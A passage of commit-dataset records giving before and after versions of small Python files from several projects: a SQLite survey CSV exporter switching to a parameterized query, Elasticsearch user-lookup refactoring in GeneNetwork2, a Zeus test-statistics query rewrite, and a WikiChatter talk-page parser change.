destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date LIKE ?", current_date)
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
Change current date in SQLite query to tupleimport sqlite3
import csv
from datetime import datetime
current_date = str(datetime.now().strftime('%Y-%m-%d'))
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
<commit_before>import sqlite3
import csv
from datetime import datetime
current_date = datetime.now().strftime('%Y-%m-%d')
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date LIKE ?", current_date)
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
<commit_msg>Change current date in SQLite query to tuple<commit_after>import sqlite3
import csv
from datetime import datetime
current_date = str(datetime.now().strftime('%Y-%m-%d'))
destination_file = 'srvy' + current_date + '.csv'
sqlite_file = 'srvy.db'
table_name = 'responses'
date_column = 'date'
time_column = 'time'
score_column = 'score'
question_column = 'question'
conn = sqlite3.connect(sqlite_file)
c = conn.cursor()
#c.execute("SELECT * FROM responses WHERE date LIKE '%"+ current_date +"%'")
c.execute("SELECT * FROM responses WHERE date = ?", (current_date,))
csvWriter = csv.writer(open(destination_file, 'w'))
rows = c.fetchall()
for row in rows:
csvWriter.writerow(row)
|
1c9540879d8761d9252c3fb3f749ae0b6d5be2b9
|
wqflask/utility/elasticsearch_tools.py
|
wqflask/utility/elasticsearch_tools.py
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
user_details = None
try:
response = es.search(
index = "users"
, doc_type = "local"
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
user_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return user_details
def save_user(user, user_id, index="users", doc_type="local"):
from time import sleep
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}])
es.create(index, doc_type, body=user, id=user_id)
sleep(1) # Delay 1 second to allow indexing
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
return get_item_by_unique_column(column_name, column_value, index="users", doc_type="local")
def save_user(user, user_id):
es_save_data("users", "local", user, user_id)
def get_item_by_unique_column(column_name, column_value, index, doc_type):
item_details = None
try:
response = es.search(
index = index
, doc_type = doc_type
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
item_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return item_details
def es_save_data(index, doc_type, data_item, data_id,):
from time import sleep
es.create(index, doc_type, body=data_item, id=data_id)
sleep(1) # Delay 1 second to allow indexing
|
Refactor common items to more generic methods.
|
Refactor common items to more generic methods.
* Refactor code that can be used in more than one place to a more
generic method/function that's called by other methods
|
Python
|
agpl-3.0
|
pjotrp/genenetwork2,zsloan/genenetwork2,DannyArends/genenetwork2,genenetwork/genenetwork2,DannyArends/genenetwork2,zsloan/genenetwork2,pjotrp/genenetwork2,DannyArends/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2,DannyArends/genenetwork2,DannyArends/genenetwork2,zsloan/genenetwork2,pjotrp/genenetwork2,DannyArends/genenetwork2,genenetwork/genenetwork2,genenetwork/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
user_details = None
try:
response = es.search(
index = "users"
, doc_type = "local"
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
user_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return user_details
def save_user(user, user_id, index="users", doc_type="local"):
from time import sleep
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}])
es.create(index, doc_type, body=user, id=user_id)
sleep(1) # Delay 1 second to allow indexing
Refactor common items to more generic methods.
* Refactor code that can be used in more than one place to a more
generic method/function that's called by other methods
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
return get_item_by_unique_column(column_name, column_value, index="users", doc_type="local")
def save_user(user, user_id):
es_save_data("users", "local", user, user_id)
def get_item_by_unique_column(column_name, column_value, index, doc_type):
item_details = None
try:
response = es.search(
index = index
, doc_type = doc_type
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
item_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return item_details
def es_save_data(index, doc_type, data_item, data_id,):
from time import sleep
es.create(index, doc_type, body=data_item, id=data_id)
sleep(1) # Delay 1 second to allow indexing
|
<commit_before>es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
user_details = None
try:
response = es.search(
index = "users"
, doc_type = "local"
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
user_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return user_details
def save_user(user, user_id, index="users", doc_type="local"):
from time import sleep
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}])
es.create(index, doc_type, body=user, id=user_id)
sleep(1) # Delay 1 second to allow indexing
<commit_msg>Refactor common items to more generic methods.
* Refactor code that can be used in more than one place to a more
generic method/function that's called by other methods<commit_after>
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
return get_item_by_unique_column(column_name, column_value, index="users", doc_type="local")
def save_user(user, user_id):
es_save_data("users", "local", user, user_id)
def get_item_by_unique_column(column_name, column_value, index, doc_type):
item_details = None
try:
response = es.search(
index = index
, doc_type = doc_type
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
item_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return item_details
def es_save_data(index, doc_type, data_item, data_id,):
from time import sleep
es.create(index, doc_type, body=data_item, id=data_id)
sleep(1) # Delay 1 second to allow indexing
|
es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
user_details = None
try:
response = es.search(
index = "users"
, doc_type = "local"
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
user_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return user_details
def save_user(user, user_id, index="users", doc_type="local"):
from time import sleep
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}])
es.create(index, doc_type, body=user, id=user_id)
sleep(1) # Delay 1 second to allow indexing
Refactor common items to more generic methods.
* Refactor code that can be used in more than one place to a more
generic method/function that's called by other methodses = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
return get_item_by_unique_column(column_name, column_value, index="users", doc_type="local")
def save_user(user, user_id):
es_save_data("users", "local", user, user_id)
def get_item_by_unique_column(column_name, column_value, index, doc_type):
item_details = None
try:
response = es.search(
index = index
, doc_type = doc_type
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
item_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return item_details
def es_save_data(index, doc_type, data_item, data_id,):
from time import sleep
es.create(index, doc_type, body=data_item, id=data_id)
sleep(1) # Delay 1 second to allow indexing
|
<commit_before>es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
user_details = None
try:
response = es.search(
index = "users"
, doc_type = "local"
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
user_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return user_details
def save_user(user, user_id, index="users", doc_type="local"):
from time import sleep
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}])
es.create(index, doc_type, body=user, id=user_id)
sleep(1) # Delay 1 second to allow indexing
<commit_msg>Refactor common items to more generic methods.
* Refactor code that can be used in more than one place to a more
generic method/function that's called by other methods<commit_after>es = None
try:
from elasticsearch import Elasticsearch, TransportError
from utility.tools import ELASTICSEARCH_HOST, ELASTICSEARCH_PORT
es = Elasticsearch([{
"host": ELASTICSEARCH_HOST
, "port": ELASTICSEARCH_PORT
}]) if (ELASTICSEARCH_HOST and ELASTICSEARCH_PORT) else None
except:
es = None
def get_user_by_unique_column(column_name, column_value):
return get_item_by_unique_column(column_name, column_value, index="users", doc_type="local")
def save_user(user, user_id):
es_save_data("users", "local", user, user_id)
def get_item_by_unique_column(column_name, column_value, index, doc_type):
item_details = None
try:
response = es.search(
index = index
, doc_type = doc_type
, body = {
"query": { "match": { column_name: column_value } }
})
if len(response["hits"]["hits"]) > 0:
item_details = response["hits"]["hits"][0]["_source"]
except TransportError as te:
pass
return item_details
def es_save_data(index, doc_type, data_item, data_id,):
from time import sleep
es.create(index, doc_type, body=data_item, id=data_id)
sleep(1) # Delay 1 second to allow indexing
|
2438efb99b85fbc76cd285792c1511e7e2813a05
|
zeus/api/resources/repository_tests.py
|
zeus/api/resources/repository_tests.py
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.join(Job, TestCase.job_id == Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
TestCase.repository_id == repo.id,
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.filter(
TestCase.job_id.in_(
db.session.query(Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
)
.subquery()
)
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
Simplify query plan for repo tests
|
ref: Simplify query plan for repo tests
|
Python
|
apache-2.0
|
getsentry/zeus,getsentry/zeus,getsentry/zeus,getsentry/zeus
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.join(Job, TestCase.job_id == Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
TestCase.repository_id == repo.id,
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
ref: Simplify query plan for repo tests
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.filter(
TestCase.job_id.in_(
db.session.query(Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
)
.subquery()
)
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
<commit_before>from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.join(Job, TestCase.job_id == Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
TestCase.repository_id == repo.id,
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
<commit_msg>ref: Simplify query plan for repo tests<commit_after>
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.filter(
TestCase.job_id.in_(
db.session.query(Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
)
.subquery()
)
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.join(Job, TestCase.job_id == Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
TestCase.repository_id == repo.id,
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
ref: Simplify query plan for repo testsfrom datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.filter(
TestCase.job_id.in_(
db.session.query(Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
)
.subquery()
)
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
<commit_before>from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.join(Job, TestCase.job_id == Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
TestCase.repository_id == repo.id,
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
<commit_msg>ref: Simplify query plan for repo tests<commit_after>from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.filter(
TestCase.job_id.in_(
db.session.query(Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
)
.subquery()
)
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
08c2e38f9c87926476e7ad346001bf2a8271ab47
|
wikichatter/TalkPageParser.py
|
wikichatter/TalkPageParser.py
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
# skip_style_tags is fix for https://github.com/kjschiroo/WikiChatter/issues/10
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections()
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections(flat=True)
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
Switch to flat sections to avoid double including subsections
|
Switch to flat sections to avoid double including subsections
|
Python
|
mit
|
kjschiroo/WikiChatter
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
# skip_style_tags is fix for https://github.com/kjschiroo/WikiChatter/issues/10
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections()
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
Switch to flat sections to avoid double including subsections
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections(flat=True)
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
<commit_before>import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
# skip_style_tags is fix for https://github.com/kjschiroo/WikiChatter/issues/10
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections()
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
<commit_msg>Switch to flat sections to avoid double including subsections<commit_after>
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections(flat=True)
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
# skip_style_tags is fix for https://github.com/kjschiroo/WikiChatter/issues/10
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections()
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
Switch to flat sections to avoid double including subsectionsimport mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections(flat=True)
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
<commit_before>import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
# skip_style_tags is fix for https://github.com/kjschiroo/WikiChatter/issues/10
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections()
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
